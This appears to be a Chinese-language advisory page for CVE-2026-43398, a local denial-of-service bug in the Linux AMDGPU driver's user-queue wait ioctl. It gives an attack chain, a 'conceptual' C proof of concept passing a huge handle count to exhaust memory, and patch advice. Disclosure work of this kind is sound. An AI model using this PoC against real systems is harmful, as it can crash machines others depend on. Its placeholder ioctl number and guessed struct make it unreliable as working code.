CVE-2026-43398 CVSS 5.5 中危

CVE-2026-43398 Linux内核AMDGPU驱动本地拒绝服务漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43398

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的AMDGPU显卡驱动组件存在一个资源管理漏洞。该漏洞源于`amdgpu_userq_wait_ioctl`函数在处理用户输入时，未对输入值进行上限检查。本地低权限攻击者可以通过传入巨大的数值触发内核内存分配错误，导致系统内存耗尽（OOM）。这可使系统崩溃或无响应，从而造成拒绝服务。

技术细节

该漏洞位于Linux内核的`drm/amdgpu`模块，具体涉及用户队列等待IOCTL的处理逻辑。在`amdgpu_userq_wait_ioctl`函数中，代码直接使用了用户传入的参数来决定分配资源的大小，但缺失了与`AMDGPU_USERQ_MAX_HANDLES`的边界比对。当攻击者传入一个接近整数上限的异常大数值时，内核会尝试分配超出物理内存容量的资源。由于无法满足分配请求，内核会触发OOM Killer机制，强制终止进程甚至导致内核恐慌，最终破坏系统可用性。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者在目标系统上获得本地低权限用户访问权限。

STEP 2

步骤2：打开设备接口

攻击者打开AMDGPU显卡设备文件（如/dev/dri/renderD128）。

STEP 3

步骤3：发送恶意请求

攻击者调用`amdgpu_userq_wait_ioctl`，并传入一个异常巨大的句柄数值。

STEP 4

步骤4：触发内存耗尽

内核尝试根据该数值分配内存，触发OOM Killer，导致系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-43398
 * Triggering OOM in amdgpu_userq_wait_ioctl
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <stdint.h>

// Placeholder for the actual IOCTL definition
#define DRM_IOCTL_AMDGPU_USERQ_WAIT 0x40 // Example value

struct amdgpu_userq_wait_args {
    uint32_t handle_count;
    uint64_t handles_ptr;
};

int main() {
    // Open the AMDGPU device (path may vary)
    int fd = open("/dev/dri/renderD128", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return -1;
    }

    struct amdgpu_userq_wait_args args;
    // Exploit: Set a huge value to trigger OOM
    args.handle_count = 0xFFFFFFFF; 
    args.handles_ptr = 0;

    printf("[+] Sending malicious payload to trigger OOM...\n");
    int ret = ioctl(fd, DRM_IOCTL_AMDGPU_USERQ_WAIT, &args);
    
    if (ret < 0) {
        perror("[+] IOCTL failed (OOM likely triggered)");
    } else {
        printf("[-] IOCTL succeeded unexpectedly\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复提交 fcec012c664247531aed3e662f4280ff804d1476 之前)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。在无法立即重启更新的情况下，应严格控制系统本地用户的访问权限，防止恶意用户利用此漏洞导致系统宕机。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表